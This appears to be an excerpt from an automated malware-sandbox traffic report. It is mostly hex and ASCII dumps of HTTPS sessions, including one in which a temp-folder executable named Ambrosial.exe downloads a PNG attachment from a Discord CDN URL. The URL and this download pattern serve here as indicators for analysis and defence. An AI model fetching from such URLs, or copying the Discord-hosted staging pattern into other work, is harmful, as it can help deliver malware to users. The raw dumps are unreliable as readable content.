                                                                                                                                                                                      2021-10-30 11:52:41 UTC930INData Raw: ad 05 1c 58 76 92 c9 11 65 47 b0 d5 e1 73 70 b3 d3 6e d2 3d e5 49 ed 4f 99 1f c3 3f 49 e1 e3 fd 91 64 e7 7d fb 55 e6 fa 12 f8 da 96 9b e6 26 c9 ce fb 2a 6c 94 3d 5a 75 ec e2 b8 5e 6c 85 cc 12 dc e9 8e b7 e5 47 96 20 87 13 50 c8 22 d4 f6 44 b2 6b 11 cf a3 86 0d f4 b8 15 fe 36 0d 9f 25 f7 d5 af 7e ad e8 1b 20 97 1d fb a0 65 1a af 78 d5 3f 75 9f fc e4 e7 4c 9b 8f 27 cc fd 0f d5 34 10 08 73 47 b5 04 fd 9c f5 ed 46 75 d9 17 0e 53 e4 a6 07 09 7b 2f b6 c0 53 91 06 19 76 ca 1d 3e af 9b 1f ba ce 0f 5e 0f dc 63 13 25 3b 64 d3 19 03 bb 6d 16 04 96 f6 ca 08 6d a5 08 66 95 a3 41 00 d5 29 4a 2e e6 be 15 89 5b 87 59 e7 3e e9 40 94 9b 18 3a ac 76 c8 a3 3b 5f b7 26 c1 6f 64 66 52 a5 26 ca 50 cb dc cd 51 e4 32 c1 eb 07 1d 44 32 17 34 07 a1 50 cb 4b c6 c6 49 2d 97 32 25 8e
                                                                                                                                                                                      Data Ascii: XveGspn=IO?Id}U&*l=Zu^lG P"Dk6%~ ex?uL'4sGFuS{/Sv>^c%;dmmfA)J.[Y>@:v;_&odfR&PQ2D24PKI-2%
                                                                                                                                                                                      2021-10-30 11:52:41 UTC931INData Raw: 1d 8d 4a ba c3 f5 bb 0a 62 1e 27 20 e9 b2 cb 76 5b 87 60 23 99 0e e4 91 a9 ed 2d 6f 7e 27 bf a2 6a 29 9e f0 c4 87 6a de 22 77 e6 24 71 da 88 82 2d 50 b4 07 c2 cd 1c f4 e8 c7 3c b8 3b ae f9 37 b0 e3 78 d9 df be 26 e7 93 5d ee 4b 95 56 df 05 06 1c ab fc ad da 7d ee 73 57 16 b5 73 30 38 8e be 67 06 52 e3 41 e4 bb 8b 49 ce 84 ab 68 f7 71 6c b4 81 a3 18 43 0c b5 54 68 a1 00 cb 4f d6 40 66 4b e4 45 99 b5 05 f9 96 ec 42 71 63 1c 07 40 04 51 a0 92 b6 c9 a0 6c 86 68 57 20 2b 59 01 a8 d1 a4 63 51 8b db 33 8f 91 8e 96 2d 23 1e 05 3f 2a d9 a6 d7 07 76 6e 53 bf ee a9 c3 67 94 cc 6e 0b a6 0c b4 5e be 39 62 4e 5a 65 a7 fd 4b 94 0d c4 5b 38 39 a2 8d 24 bb d4 4e 2c fd 42 8d 6b 57 2e a0 ad bd c0 84 5a 0f c0 d3 a8 95 9e a6 bd e5 1d dd 35 fc db 34 51 c2 20 0b 52 17 01 9d 71
                                                                                                                                                                                      Data Ascii: Jb' v[`#-o~'j)j"w$q-P<;7x&]KV}sWs08gRAIhqlCThO@fKEBqc@QlhW +YcQ3-#?*vnSgn^9bNZeK[89$N,BkW.Z54Q Rq
                                                                                                                                                                                      2021-10-30 11:52:41 UTC933INData Raw: 3e 64 59 01 85 4b a5 ba 5c ec ba ca f0 98 07 3d f0 1e dd 6f fd c6 73 ba 33 f0 b9 60 2b e2 2f fe 42 bf 9a 88 39 2d 31 38 44 c0 f9 3a d0 fb 45 de 34 ab 4a d8 79 1f 89 47 5b 3d 79 83 8f d5 01 f1 6f 57 f8 5b b5 7b dc e3 8e dd ed 6f 7f ab 98 4a 73 83 2b 23 ef d9 68 c4 8f 0a dc c4 18 e9 51 8f 5d fe 84 f3 45 cf ff fb ee 32 fc 6d b0 c8 e8 03 c4 cf fe 03 51 66 b7 c9 07 19 e0 3a 09 b9 0e 40 8e e4 78 db db de d3 bd f5 6d ef 36 6d 3e e6 3e 55 8b 7d 45 f4 ed c1 e2 83 74 1a c0 d0 ad 24 da 29 cb 4e 6d 7a 6f 36 29 dd 9b b1 d7 42 4b e3 bc 88 4a c5 17 6d 5a bc b5 08 3e f9 61 1e 6e de ae 20 8b 33 1a 82 e6 31 c9 e2 62 38 db 56 09 4a ad e7 ee f9 01 19 91 71 43 08 6a c5 2b ea 03 a3 84 3d 21 82 ca b0 a9 e2 3e b5 40 b3 08 f8 2a ca c8 d1 43 60 1b 93 c7 81 28 cf a7 39 9d b0 cb fd
                                                                                                                                                                                      Data Ascii: >dYK\=os3`+/B9-18D:E4JyG[=yoW[{oJs+#hQ]E2mQf:@xm6m>>U}Et$)Nmzo6)BKJmZ>an 31b8VJqCj+=!>@*C`(9
                                                                                                                                                                                      2021-10-30 11:52:41 UTC934INData Raw: d0 12 1c 72 a3 e3 ba f3 df f3 c1 ee ea 8b fd 49 99 f4 68 79 63 df 64 e2 c0 13 b5 2b 2f b8 b0 3b fa cc f5 fe be 02 5f 37 75 e8 a9 27 77 47 dd e5 4c 29 da ee c0 6f 33 d8 71 d0 41 dd 2e dc 8c e5 57 5f fc 3d dc 75 d7 5e 2b 05 d8 ae 6e d7 51 47 74 07 9e 78 7c 77 f0 c9 37 ee 0e bb c3 ed ba 63 1f fe 80 ee 06 f7 bb 7b 77 f0 69 37 ed 76 1d 3a f5 59 5b d3 b8 ec 7d 1f ea 2e fa d7 b7 88 64 f3 b5 39 87 b3 89 32 45 df 25 bb ee 56 2a d4 3e fc 51 fd be ce bc e0 be 53 b8 e8 27 a3 20 79 c5 d6 97 87 0b b6 ab e5 05 f7 a0 93 4e ec 76 cb 5a 2e c1 2e f9 e5 e4 c2 0f c8 38 4d 8f dc 87 4d 40 4e ba ae 15 f6 6a 12 1e d6 ef a3 1f f9 74 77 ee 03 ee d1 ed 94 a2 7d 1d dc e4 a4 1b f1 3f 43 f1 01 b9 77 bc c3 ad bb a3 64 6e 47 1f 7d 24 bf 41 00 df 1b 7a d5 55 57 77 bb a5 80 3f 5e ce ad 53
                                                                                                                                                                                      Data Ascii: rIhycd+/;_7u'wGL)o3qA.W_=u^+nQGtx|w7c{wi7v:Y[}.d92E%V*>QS' yNvZ..8MM@Njtw}?CwdnG}$AzUWw?^S
                                                                                                                                                                                      2021-10-30 11:52:41 UTC935INData Raw: 9e 20 0a 3f 61 10 a1 0c 3e b5 e1 6f d2 8e 94 42 6d 29 ce 7f e3 db bb eb f0 c8 3d 75 62 7c 00 3e 09 07 6f 14 c9 94 e5 32 ca 51 c6 5e f6 85 2f f1 ad cc a5 c0 7f 80 e6 35 31 41 a0 ab e1 72 d6 41 1f fb ab 97 76 17 bc 7f f9 d7 cd ec 0b b8 f2 8b e7 75 17 bc ec ff 76 d7 5d 71 a5 1a c2 9c 7b 48 0b 60 6f 2d 06 7d 33 08 79 28 0e e4 4d fd 1a 87 d0 0b 35 03 c6 06 31 8d 51 f9 25 6f 7f 17 f9 12 1c 75 eb 9b 77 37 b8 c5 a9 fa 1f a0 f8 4f 4e e1 c5 3f 0e 58 81 96 e4 5d 3b b4 48 a3 4d e3 72 81 27 1c 79 84 ff db 3f bd b5 fb 3f 7f f4 02 eb 65 ff c3 1f fe ef e7 77 af 79 cd bf 98 a6 97 61 a4 1a d1 d6 f2 2f 01 0f ad 8a eb 21 dc 39 c7 c6 f4 92 17 2f ff 0f d0 b3 ce ba 4d 77 af 7b cf 7f 5b b7 9e cf c1 f2 0b f2 13 9e f2 48 d3 e6 e3 55 2f ff 87 ee 5a 7c 8e 9d 4c 08 73 c2 fd 55 4e b7
                                                                                                                                                                                      Data Ascii: ?a>oBm)=ub|>o2Q^/51ArAvuv]q{H`o-}3y(M51Q%ouw7ON?X];HMr'y??ewya/!9/Mw{[HU/Z|LsUN
                                                                                                                                                                                      2021-10-30 11:52:41 UTC937INData Raw: 8b d4 6d 78 43 20 46 91 02 82 bf 99 73 fc 8e 3f 2e 77 ff c7 5f 2f a7 ed 2e d5 37 22 1e 96 03 e5 23 93 bb 8d 4b 33 1d 63 fa bb 3e db db a8 48 75 b9 4f e6 11 87 7a cf 83 8a 3a 7e e7 cf 63 a2 3d 9e b5 14 67 ee 3b 52 4e ed e1 0f 24 5f fb 9a bf ae 87 2b 1c b4 a0 69 eb c1 4b 25 1d ce 9a 3b 69 ce b5 87 35 e4 a3 3e 0e 7f 5f b8 fb 9e f2 96 9f fd a5 f2 fb 9f be c3 7a fb c6 c3 67 3e 73 67 f9 99 37 ff 62 b9 f3 ce ed ff 08 1a 22 bd 5e cf 06 bc ac 06 b7 7b bd 88 66 1c 70 7a 51 7c e9 4f 0f 0f fe 94 c4 6e fc bd bf ff 23 66 b5 98 8c cd 08 a8 d7 ed e1 eb bb 1e 7e f0 91 f2 b1 9b 6e 89 11 e3 9c 01 a1 ed 02 0e 0f 31 aa 9f 75 fd 48 a1 4f 41 3e 29 82 a6 14 89 9a 60 2f 77 d5 5e f4 a2 6b ca f5 d7 2f 1f d6 80 71 bf 60 39 52 b3 7b 38 3f 8a 09 66 e8 55 fb a7 03 ea b8 64 8c 38 40 f9
                                                                                                                                                                                      Data Ascii: mxC Fs?.w_/.7"#K3c>HuOz:~c=g;RN$_+iK%;i5>_zg>sg7b"^{fpzQ|On#f~n1uHOA>)`/w^k/q`9R{8?fUd8@
                                                                                                                                                                                      2021-10-30 11:52:41 UTC938INData Raw: e8 b1 ba 9c 02 2e a3 9a 01 e7 ea 1d 36 97 2e 57 a8 be ee d9 22 b7 37 d7 36 c7 25 41 8f af a9 33 87 df fa c0 f6 2f 21 3f 74 e8 60 f9 b1 bf ab 7f c3 af 19 83 14 b9 ff 6b 5e 70 75 f9 fe 1f dc fe f7 19 3f 7c 63 3d 14 c9 f6 89 e5 8f bb 66 08 40 83 73 db 04 e8 ef ae a1 cc f1 80 e5 05 22 7f 8a e3 72 78 fc af 1f bc d5 bc f5 78 c3 1b 70 50 1b f6 3e c1 ee 8c e7 07 b8 a6 f9 ba 3a 46 5c c5 60 36 67 31 c1 e5 be 14 73 39 ab c6 be 69 6c 6d 32 da ea a5 1a 8d 29 50 af 7d e4 b8 d8 e2 f8 5b bb 46 15 39 67 35 66 e6 e5 34 5f 23 74 50 a8 a8 9f 90 5e 27 6e d5 94 36 ff fc 37 bf e6 07 da af 90 12 c4 c0 63 52 a9 14 f5 c2 1f 7c 4d b9 e4 25 d7 d2 5f 8b a7 8e 3c 50 8e 7e 4c ff ef 93 b7 47 2d 05 b4 2f 9c 2e 64 8e b1 50 1f 54 fa 10 6d 61 53 95 22 4f 5f 95 6b 8b d1 75 5d ca c9 23 c7 ca
                                                                                                                                                                                      Data Ascii: .6.W"76%A3/!?t`k^pu?|c=f@s"rxxpP>:F\`6g1s9ilm2)P}[F9g5f4_#tP^'n67cR|M%_<P~LG-/.dPTmaS"O_ku]#
                                                                                                                                                                                      2021-10-30 11:52:41 UTC942INData Raw: b0 84 b3 00 56 21 4b 0f 5e 06 13 47 ce 55 5b 07 41 8d 5c 7a 63 dd 73 40 b6 77 63 fb 84 bd df b5 fd 6c 1b cf 18 7b 69 63 6e 66 7e dd 73 bc c9 15 a7 af 0b 7f 9a 6f fb 88 76 85 be 7f c1 d0 98 7a ba ff 1c ce 27 6a 02 b4 ee 8f 1e 6c 8b f4 52 0b fb 8f e5 de ce d5 58 b6 b5 db 66 c3 eb 04 8b 67 12 ef 05 22 3d 5a ae 66 d5 b5 1f e7 b4 5c 87 14 5c cc db 88 fd 78 8d b5 d0 d1 b1 94 a2 1f ab f3 67 0b 6d 62 d8 fa 84 b5 1f 7d 9a 97 de 49 fd 03 5d e3 53 be fa a8 a7 e2 74 f8 a2 00 c9 62 a9 09 66 46 44 9d f0 bd 11 53 01 d8 14 0f a4 a0 e5 57 58 0e 38 13 7e 68 db ec a1 7c 39 f2 63 e2 73 33 53 d9 a6 86 0f a7 f5 55 b4 51 86 9d 63 3c fb 0b 31 e7 82 67 72 f0 e2 88 98 32 13 53 0a 24 ae 4a ac 7c 88 83 eb 6c 2c af e9 24 63 06 bb 52 6c 1c 40 9b 9a 02 23 30 b9 6b 1c 6e f0 5d cc a0 87
                                                                                                                                                                                      Data Ascii: V!K^GU[A\zcs@wcl{icnf~sovz'jlRXfg"=Zf\\xgmb}I]StbfFDSWX8~h|9cs3SUQc<1gr2S$J|l,$cRl@#0kn]


                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                      2192.168.2.349748162.159.133.233443C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                                      2021-10-30 11:52:03 UTC19OUTGET /attachments/757752473690570865/882393335279534180/zephyrNewB.png HTTP/1.1
                                                                                                                                                                                      Host: cdn.discordapp.com
                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                      2021-10-30 11:52:03 UTC19INHTTP/1.1 200 OK
                                                                                                                                                                                      Date: Sat, 30 Oct 2021 11:52:03 GMT
                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                      Content-Length: 51625
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      CF-Ray: 6a646f6deb6268fd-FRA
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Age: 113682
                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                      ETag: "93a8e487ac8ce3f27b99b41dffc28551"
                                                                                                                                                                                      Expires: Sun, 30 Oct 2022 11:52:03 GMT
                                                                                                                                                                                      Last-Modified: Tue, 31 Aug 2021 22:36:05 GMT
                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                      CF-Cache-Status: HIT
                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                      Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                      x-goog-generation: 1630449365243747
                                                                                                                                                                                      x-goog-hash: crc32c=1FicIw==
                                                                                                                                                                                      x-goog-hash: md5=k6jkh6yM4/J7mbQd/8KFUQ==
                                                                                                                                                                                      x-goog-metageneration: 1
                                                                                                                                                                                      x-goog-storage-class: STANDARD
                                                                                                                                                                                      x-goog-stored-content-encoding: identity
                                                                                                                                                                                      x-goog-stored-content-length: 51625
                                                                                                                                                                                      X-GUploader-UploadID: ADPycdt1ICNIEMaMI42SuNN7i8_NOKopXF6JXUHbBcq-xHfTiJPeMPhUeTgm6F0bxmQuMCMEl8Tr2TrGyPfu_yPBpIc
                                                                                                                                                                                      X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=u9Nr3ix%2BNMWCCfx4F9JT8JfPV%2B2X2ANrxOM1DA%2BAytUCr6Zf3CuE6KI2UXvTsbaQdziqafMld%2Bvtn8JU8S4BlHwySeguttgZdrrKe%2BTZ77unoeb9YF9pqfgK7OSlVWVMR1vRQg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                      2021-10-30 11:52:03 UTC21INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                      Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                      2021-10-30 11:52:03 UTC21INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 6a 00 00 00 bf 08 06 00 00 00 4e be f0 ca 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c1 00 00 0e c1 01 b8 91 6b ed 00 00 c9 3e 49 44 41 54 78 5e ed bd 0b d8 75 df 58 ef bf d4 de ff bd 3b a8 4d bb 1d 7b a7 44 a8 14 39 9f cb 99 12 39 2b 09 1d 9c cb 56 22 42 24 42 22 44 ce 84 10 3f 91 48 07 39 76 ce b9 84 42 42 28 87 4a c2 6e 1f ff 3e f3 59 df d7 f7 bd df fb 1e 87 b9 d6 f3 bc cf fb d3 e7 ba ee 6b 8c 71 8f 7b 8c 39 c6 98 63 ce 71 af 31 d7 9a eb 1c e7 3e f7 b9 ff df e6 08 39 c7 39 ce b1 8d 7d 36 4e 18 e3 ad 74 c6 ff fb 7f 79 37 bc 7c 26 b2 a9 a8 ea 75 2a 1b d7 2b 4e e8 f2 7f ff ef ff 3d 11 66 f1 28 aa 23 0b 77 25 1b 87 11 dd ac
                                                                                                                                                                                      Data Ascii: PNGIHDRjNsRGBgAMAapHYsk>IDATx^uX;M{D99+V"B$B"D?H9vBB(Jn>Ykq{9cq1>99}6Nty7|&u*+N=f(#w%
                                                                                                                                                                                      2021-10-30 11:52:03 UTC22INData Raw: f5 03 02 39 6b 38 6a be a3 86 f4 9c 34 f0 78 86 e7 79 99 56 e8 44 1d 69 e4 b4 3a 6a 7e c3 f0 38 e8 84 3a 95 4d 4b dc ae 85 06 64 84 51 bb 1e 59 bb a2 4e f1 cc 76 2d aa ab 55 df e8 b1 7a 76 a3 f5 88 59 7b 3f 17 7e 0e a3 de 71 3b b1 6f 5d 8b ca be 55 47 cc 9b 4d 43 ab fe d3 4d 3c ef 9e ee c5 47 74 99 28 cf c3 0a 2f d7 b3 cd 60 ec 35 fe 8a 23 d9 a2 b0 2b 6b da 37 c3 da 36 56 e5 bc df ad 50 52 91 95 a9 68 d9 cc e4 55 21 10 f7 b4 88 fa cc c6 a9 ea 68 d1 cb 1f 61 1f 75 08 bf 76 70 d2 24 38 5b fa ce 19 12 77 d1 70 ce 5c f4 d8 53 df 51 a3 3e 77 d4 b4 8b 26 e7 0c 47 4d ce 5a e6 a8 e9 fb 6a 7a f4 e9 ce 5a e5 b0 55 22 3c 3e 42 65 ef fa d3 e2 a8 55 37 92 4c 1f 75 4a c7 10 88 4b 3c 2d 3c be 96 de 49 c8 f2 33 5d d6 ae a8 cb da 9b e9 46 a9 ea 1c 65 a4 6c cb a6 ca db a5
                                                                                                                                                                                      Data Ascii: 9k8j4xyVDi:j~8:MKdQYNv-UzvY{?~q;o]UGMCM<Gt(/`5#+k76VPRhU!hauvp$8[wp\SQ>w&GMZjzZU"<>BeU7LuJK<-<I3]Fel
                                                                                                                                                                                      2021-10-30 11:52:03 UTC23INData Raw: 55 46 e7 5d 6b a0 9c 2f ed 96 c9 39 73 71 07 0d e7 8c 90 f2 2e d4 85 54 f1 4a 07 31 ae 30 ea 20 b3 f3 10 7a f1 d3 e2 a8 29 9d c5 5d 2a bd c4 f3 7b 78 e7 47 69 95 a9 f2 32 bd eb 14 27 cc a4 37 69 5c 54 8f f0 78 c6 c8 38 39 95 7d d4 b7 d2 a3 79 23 f1 d8 67 42 1f 23 e9 3c 2e 3c 2e 46 75 30 ab 1f 21 96 6d a5 7b b6 90 e9 8e 13 7e 2e 61 e6 fc ef 5b e7 68 dc 3c 94 78 5a 71 27 a6 9d ec 58 8e b7 2f 8a 16 3b 0f a3 4e a2 3a 3c 74 32 dd 0c ad 3e 42 96 5f 95 c9 f4 6a 9f fa 15 1d 35 2d f6 1a 03 c0 4e 75 11 4a 3c ad b8 c2 4c a7 b0 95 17 c3 d1 bc 91 b4 e2 59 08 b3 3a a8 e2 30 9b 16 99 5e e7 cd 43 9d 23 3f 7f da 49 c3 f9 f2 9d b4 28 72 d0 64 ef e7 1b f4 c8 32 3a 6a ee 9c 29 8f 50 f6 08 eb 84 84 be c4 50 12 d3 2d 81 b5 21 b4 74 e0 f1 23 75 d4 b2 50 12 d3 51 5a f9 ca ab f0
                                                                                                                                                                                      Data Ascii: UF]k/9sq.TJ10 z)]*{xGi2'7i\Tx89}y#gB#<.<.Fu0!m{~.a[h<xZq'X/;N:<t2>B_j5-NuJ<LY:0^C#?I(rd2:j)PP-!t#uPQZ
                                                                                                                                                                                      2021-10-30 11:52:03 UTC25INData Raw: b4 d2 8a 8f 84 d0 8b 57 f9 30 9a 27 32 9d e6 08 a1 8b 3b 68 2d 27 4d f1 e8 a0 a9 bc e0 d8 7e 7d 49 2a 07 2d 5e 87 2a 4b 7c 44 a2 6d af ac da a8 30 d3 89 91 3c 68 e5 67 ba 43 7d f4 e9 27 3a 86 31 1e a5 95 27 e1 64 7b ba 2a b3 16 1f 30 a7 d2 3b 3e e8 d1 5e ba 28 ca 73 62 5a 78 df 3c cc e2 6b c9 ca 47 5d cf a6 65 3f 12 17 d9 38 54 63 13 99 29 3b ab 17 e4 67 ed 16 23 6d e8 a5 21 d3 1d 27 e2 18 8c 9c e3 2c 1e 43 98 d5 41 15 17 e8 24 c2 e3 8c 37 37 72 16 0b 1e b5 f4 c6 9f 7c b7 c9 8e d9 42 f6 55 b9 d8 ce 68 1f 43 f0 b8 13 f5 23 73 2b b3 19 29 57 11 c7 ca db 5f 89 f2 1d af 27 8b b7 74 9e 57 51 95 21 f4 f2 1e 87 2c af 0a 9d ac 1c 64 b6 91 11 9b 16 71 9c 25 72 94 11 77 ce e4 98 e9 11 a7 44 8f 3a e5 ac c9 51 93 93 46 3b b9 b6 e4 8c e9 1a 8b 92 39 6c 72 ae 7a 4e d6
                                                                                                                                                                                      Data Ascii: W0'2;h-'M~}I*-^*K|Dm0<hgC}':1'd{*0;>^(sbZx<kG]e?8Tc);g#m!',CA$77r|BUhC#s+)W_'tWQ!,dq%rwD:QF;9lrzN
                                                                                                                                                                                      2021-10-30 11:52:03 UTC26INData Raw: 89 16 7f 44 3a ef 8b a0 4e d5 1b e3 0a 33 dd 6c d8 8a 57 79 59 08 fb 8a 43 2f 1d d1 f8 65 e3 ad 9d 31 39 60 ee 94 45 07 8d 50 e7 47 75 71 6c 84 eb 02 91 53 e6 22 bd 87 2a e3 61 26 90 e9 2b 69 d5 e5 e2 f5 2a de 0a a1 a5 83 96 6d 0c c1 e3 70 28 3f 26 f0 93 1f c3 18 77 a9 f4 99 f8 85 1a f5 aa 47 28 de 1a 98 8c 2a bf a5 97 c4 74 14 cf df 05 f5 cd fb af b8 c4 f3 85 c7 41 f9 d1 ce c9 f4 23 3a 4f 8f c4 21 a6 1d 1f bf 88 eb 62 7e 35 d6 fb d2 8f 32 d2 ae 5d 8f 71 d8 b4 ce d7 4c 7c df 3a f0 38 c4 34 44 9d 16 8a 7f fd d7 7f 5d 42 c1 02 74 8f 7b dc 63 f3 4d df f4 4d 9b af f9 9a af d9 fc b7 ff f6 df 4e 3c f6 d4 17 a6 7d 41 63 01 fb e2 2f fe e2 cd 87 3f fc e1 cd 9b de f4 a6 6d 2d 07 f4 da 31 d2 ce cc 06 aa 7a 62 5c e9 18 66 cc cc ff 11 dd e8 9c f6 b6 21 d5 bd 5e 22 bc
                                                                                                                                                                                      Data Ascii: D:N3lWyYC/e19`EPGuqlS"*a&+i*mp(?&wG(*tA#:O!b~52]qL|:84D]Bt{cMMN<}Ac/?m-1zb\f!^"
                                                                                                                                                                                      2021-10-30 11:52:03 UTC27INData Raw: 3d 13 1f d5 c1 68 3e 54 71 91 e9 40 0b 08 8f 3d 05 b6 7c 2f 8d 1f 0d 9c e7 3c e7 29 9d 34 ce 19 0e de cd 6e 76 b3 cd 03 1e f0 80 cd c3 1e f6 b0 cd 05 2f 78 c1 cd bb de f5 ae 13 ef 5f fb fa af ff fa 25 14 87 71 9e 55 27 61 26 be 20 ee b2 38 66 64 fa ca 16 62 bd 0e 69 89 70 5d 4f 84 e2 2d 9d e7 f5 c8 ca 7a f9 5e dc 75 a2 2a 53 d1 b3 89 f9 cc 61 09 f7 73 89 ee fd d1 39 93 63 86 f0 fd cb b8 93 86 2d 42 79 ad 0f c0 71 99 4b ee 88 c9 39 73 c7 0c 59 3b ff a0 a5 1b 95 0c cf ab 6c 22 a3 f6 9e 9f d9 c6 7a 7a f5 1d 89 a3 96 a1 93 bd 06 9f 88 4e d4 67 a1 e7 8b 98 76 5a 03 4e 7a 44 64 1b c9 74 50 e9 7b 78 ff 10 2e 2a 39 60 72 ca 74 a1 ba a0 97 93 26 89 75 65 8c ea 2b bb b5 54 63 da d3 3b 95 2e d3 8b 5e 7e 8f ea 98 c7 99 d6 b9 9c 89 8f ea 60 34 1f aa b8 c8 74 a0 05 26
                                                                                                                                                                                      Data Ascii: =h>Tq@=|/<)4nv/x_%qU'a& 8fdbip]O-z^u*Sas9c-ByqK9sY;l"zzNgvZNzDdtP{x.*9`rt&ue+Tc;.^~`4t&
                                                                                                                                                                                      2021-10-30 11:52:03 UTC29INData Raw: 01 eb c2 e5 a2 e4 22 45 f8 bb 1b fe 0e 87 50 3a f2 a3 c3 96 39 6b 15 33 f9 3d db d8 9f 2c 2d 51 da 89 69 70 7b 27 d3 89 aa cc 0c bb 96 3f 6c e2 b9 a8 ce 53 2f be 26 bf 57 06 3c 0e bd 74 06 0b 48 dc 4d e3 9d 69 38 68 5f fe e5 5f be 38 69 cc 7f e6 7c 84 05 e9 39 cf 79 ce e6 03 1f f8 c0 56 73 32 1c ff 9b bf f9 9b 97 05 8f 6b e5 8d 6f 7c e3 36 e7 e8 d1 5c d3 bc 75 89 8b a9 87 31 cf 25 12 75 99 8d f0 bc 96 9d 13 cb b4 c4 6d 84 eb 47 89 65 b2 fa a0 8a 3b fb a8 c3 61 7e 49 74 2f d6 bd 9d f9 2a e7 8c fb b6 ee f3 88 3e 90 eb fe ae 34 f3 34 73 ce 10 a0 4d 9a 0b d1 31 93 b4 e6 cb 88 38 99 de 75 95 44 bb 0a cf f3 72 59 98 91 95 af c8 f2 47 8e a1 b1 8f 1c ea a3 4f 3f a8 4f 80 0a d9 b8 54 f4 f2 5b 78 fd 2e 19 0c 6a 1c 58 e9 32 f1 7c e1 f1 c8 da 3c 88 f9 a4 5d 80 7e e9
                                                                                                                                                                                      Data Ascii: "EP:9k3=,-Qip{'?lS/&W<tHMi8h__8i|9yVs2ko|6\u1%umGe;a~It/*>44sM18uDrYGO?OT[x.jX2|<]~
                                                                                                                                                                                      2021-10-30 11:52:03 UTC30INData Raw: cb e2 99 44 a4 9b 0d a1 a5 03 8f 67 ac 2d e7 68 de 70 af 95 a3 26 67 cd 1d 35 ee cf 72 d4 90 b8 83 86 70 af c7 9e b2 08 f5 01 ed 41 38 d7 ba 46 08 5d 34 17 7c 4e 28 94 b4 70 bb 68 3b a2 57 5e d4 b5 44 78 5c 64 3a a1 bc 96 0d f4 8e 91 91 d5 4d 1c f1 fb 83 e2 ae db 9b a3 96 55 ee 71 81 4e 32 ca 4c 99 d9 7a 47 d1 80 66 a2 7c e1 71 91 e9 9c 2a bf 57 4e c8 8e d0 2f 26 c4 2f 38 d9 d1 77 2e 7a 2e 78 df 59 93 93 86 68 57 4d ce 5a bc d8 a3 c3 56 b1 36 0f 62 ff 49 4b a7 b8 a7 85 c7 9d 35 fa 2a ef 4c 25 8e 79 2b ad 78 a6 83 98 3f 6a 07 23 71 e8 a5 7b 70 fe e2 6e da d5 af 7e f5 a1 dd 34 ca f2 12 db e7 3f ff f9 5b cd a9 e8 57 a3 7a ff da f3 9e f7 bc 6d ce 01 b4 57 22 aa 3e cc f6 6d 16 cd 65 0f 25 f1 be 11 e3 6e 13 cb 46 5c 97 e5 8b 98 d7 4a 13 9f 91 11 64 17 43 70 5d
                                                                                                                                                                                      Data Ascii: Dg-hp&g5rpA8F]4|N(ph;W^Dx\d:MUqN2LzGf|q*WN/&/8w.z.xYhWMZV6bIK5*L%y+x?j#q{pn~4?[WzmW">me%nF\JdCp]
                                                                                                                                                                                      2021-10-30 11:52:03 UTC31INData Raw: df ce cd 6f 7e f3 a1 dd 34 e6 c2 fb df ff fe cd 2b 5f f9 ca ad e6 64 f8 03 77 fd 89 fb b9 cf 7d ee e5 9a 68 ed a6 c5 b6 79 3a e6 89 4a 7f 18 68 ee eb 3a c8 84 f1 f4 c5 1b e1 de 81 e0 9c f1 a3 0b e4 13 9f f8 c4 e6 93 9f fc e4 22 c4 3f fe f1 8f 2f f1 cc 61 8b f5 21 8e d2 d1 a6 12 d9 3a 51 1f f3 21 cb cb e2 b1 6c af 5c 06 e7 55 a2 39 42 98 39 6a 38 61 ba 17 23 72 d2 94 8e 8e 9a 3e 38 03 ed 40 18 63 77 cc 74 bf 8f 92 9d df 28 3d 2a db 4a 0f 9e a7 fc a8 8b 12 6d 84 e7 8d 84 4e 4f 97 e5 3b 99 6d af 4c bc c6 63 5a ec ec a8 a9 62 3f 40 76 30 74 55 23 2a 54 c6 25 d3 57 30 48 71 a0 e2 60 ba b8 4e 71 27 a6 33 7a 36 ad fc b5 79 42 36 84 88 2e 3c dd 4c e5 a8 71 53 f5 4f bd c4 d1 e3 cc 71 c1 02 17 3b 17 be 6e 16 7e 63 40 fc c6 80 64 ce 1a 64 e7 a7 75 ce 46 f0 b1 f0 3e
                                                                                                                                                                                      Data Ascii: o~4+_dw}hy:Jh:"?/a!:Q!l\U9B9j8a#r>8@cwt(=*JmNO;mLcZb?@v0tU#*T%W0Hq`Nq'3z6yB6.<LqSOq;n~c@dduF>
